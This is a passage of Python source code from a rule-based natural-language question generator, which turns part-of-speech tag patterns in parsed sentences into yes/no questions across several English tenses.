##########################################################################################\n ######################################## VBN ##################################################\n if all(key in bucket for key in VBNDT1): # 'NNP', 'VBZ' ,'VBN' , 'IN , 'DT' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT1'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN1): # 'NNP', 'VBZ' ,'VBN' in 
sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in VBN1): # 'NNP', 'VBZ' ,'VBN' in sentence.\n question = 'Has' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT2'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN2'\n questions.append(question)\n\n elif all(key in bucket for key in VBN2): # 'PRP', 'VBZ' ,'VBN' in sentence.\n question = 'Has' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT3): # 'NNP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT3'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN3): # 'NNP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN3'\n questions.append(question)\n\n elif all(key in bucket for key in VBN3): # 'NNP', 'VBP' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN3'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT4): # 'PRP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT4'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN4): # 'PRP', 'VBP' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + 
'?'\n pattern_name = 'VBNIN4'\n questions.append(question)\n\n elif all(key in bucket for key in VBN4): # 'PRP', 'VBP' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN4'\n questions.append(question)\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT5): # 'NNP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT5'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN5): # 'NNP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN5'\n questions.append(question)\n\n elif all(key in bucket for key in VBN5): # 'NNP', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN5'\n questions.append(question)\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT6): # 'PRP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT6'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN6): # 'PRP', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN6'\n questions.append(question)\n\n elif all(key in bucket for key in VBN6): # 'PRP', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN6'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT7'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN7'\n questions.append(question)\n\n elif all(key in bucket for key in VBN7): # 'NNPS', 'VBD' ,'VBN' in sentence.\n question = 'Had' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBN']] + ' 
' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN7'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT8'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = 'VBNIN8'\n questions.append(question)\n\n elif all(key in bucket for key in VBN8): # 'NNPS', 'VBD' ,'VBN' in sentence.\n question = 'Have' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBN']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'VBN8'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n elif all(key in bucket for key in VBNDT9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'VBNDT9'\n questions.append(question)\n\n elif all(key in bucket for key in VBNIN9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'VBNIN9'\n questions.append(question)\n\n elif all(key in bucket for key in VBN9): # 'NNPS', 'VBD' ,'VBN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Has' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBN']] + ' ' + j[0] + ' ' + '?'\n pattern_name = 'VBN9'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------#\n\n ########################################### End VBN ##################################?????????????????????????!!!!!!!!!!!!!!!!!!'''\n\n ########################################### present continouse #############################\n elif all(key in bucket for key in PRCDT1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[\n bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRCDT1'\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRCIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRC1): # 'NNP', 'VBG', 'VBZ', 'IN' in sentence.\n question = 'Is' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n 
bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRC1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT2): # 'NNP', 'VBG', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT2\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN2): # 'NNP', 'VBG', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[bucket['VBG']] + ' ' + \\\n line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PRCIN2\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC2): # 'NNP', 'VBG', 'VBZ' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC2\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT3\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN3\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC3): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Is' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC3\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT4): # 'NNPS', 'VBG', 'VBP' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT4\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN4): # 'NNPS', 'VBG', 'VBP' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN4\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC4): # 'NNPS', 'VBG', 'VBP' in sentence.\n question = 'Are' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC4\"\n questions.append(question)\n\n # 
-----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT5): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT5\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN5): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PRCIN5\"\n questions.append(question)\n\n elif all(key in bucket for key in PRC5): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Is' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + j[0] + ' ' + '?'\n pattern_name = \"PRC5\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRCDT6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PRCDT6\"\n questions.append(question)\n\n elif all(key in bucket for key in PRCIN6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PRCIN6\"\n questions.append(question)\n\n\n elif all(key in bucket for key in PRC6): # 'NNPS', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Are' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PRC6\"\n questions.append(question)\n\n ########################## Past Cont. 
###################################\n elif all(key in bucket for key in PACDT1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT1\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN1\"\n questions.append(question)\n\n\n elif all(key in bucket for key in PAC1): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Was' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC1\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT2\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN2\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC2): # 'NNP', 'VBG', 'VBD', 'IN' in sentence.\n question = 'Were' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC2\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT3\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n j[0] + '?'\n pattern_name = \"PACIN3\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC3): # 'NNP', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['he', 'she', 'it']:\n question = 'Was' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC3\"\n questions.append(question)\n\n # 
-----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT4\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n j[0] + '?'\n pattern_name = \"PACIN4\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC4): # 'NNPS', 'VBG', 'VBD' in sentence.\n if line.words[bucket['PRP']] in ['i', 'you', 'we', 'they']:\n question = 'Were' + ' ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = \"PAC4\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + \"anything\" + ' ' + line.words[bucket['IN']] + ' ' + line.words[\n bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT5\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + 'anything' + ' ' + line.words[bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = \"PACIN5\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC5): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Was' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBG']] + ' ' + j[0] + ' ' + '?'\n pattern_name = \"PAC5\"\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PACDT6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + \\\n line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = \"PACDT6\"\n questions.append(question)\n\n elif all(key in bucket for key in PACIN6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[bucket['IN']] + ' ' + j[\n 0] + '?'\n pattern_name = \"PACIN6\"\n questions.append(question)\n\n elif all(key in bucket for key in PAC6): # 'PRP', 'VBG', 'VBP', 'IN' in sentence.\n question = 'Were' + ' ' + line.words[bucket['NNS']] + ' ' + line.words[\n bucket['VBG']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n 
pattern_name = \"PAC6\"\n questions.append(question)\n\n ############################## Present Simple ######################################\n elif all(key in bucket for key in PRSDT1): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT1'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN1): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN1'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRS1): # 'NNP', 'VBZ', 'NN' in sentence\n question = 'Does' + ' ' + line.words[bucket['NNP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS1'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT2'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN2): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN2'\n questions.append(question)\n\n\n elif all(key in bucket for key in PRS2): # 'NNP', 'VBZ' in sentence.\n question = 'Does ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS2'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT3): # 'NNPS', 'VBP', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT3'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN3): # 'NNPS', 'VBP', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN3'\n questions.append(question)\n\n elif all(key in bucket for key in PRS3): # 'NNPS', 'VBP', 'NN' in sentence\n question = 'Do' + ' ' + line.words[bucket['NNPS']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS3'\n questions.append(question)\n\n # 
-----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + line.words[bucket['DT']] + ' ' + j[0] + '?'\n pattern_name = 'PRSDT4'\n questions.append(question)\n\n elif all(key in bucket for key in PRSIN4): # 'NNP', 'VBZ' in sentence.\n if line.words[bucket['NN']] != j[0]:\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['IN']] + ' ' + j[0] + '?'\n pattern_name = 'PRSIN4'\n questions.append(question)\n\n elif all(key in bucket for key in PRS4): # 'NNP', 'VBZ' in sentence.\n question = 'Do ' + line.words[bucket['PRP']] + ' ' + line.words[\n bucket['VBP']] + ' ' + line.words[bucket['NN']] + ' ' + '?'\n pattern_name = 'PRS4'\n questions.append(question)\n\n # -----------------------------------------------------------------------------------------------------------#\n elif all(key in bucket for key in PRSDT5): # 'NNP', 'VBZ', 'NN' in sentence\n if line.words[bucket['NN']] != j[0]:\n question = 'Does' + ' ' + line.words[bucket['NN']] + ' ' + line.words[\n bucket['VBZ']].singularize() + ' ' 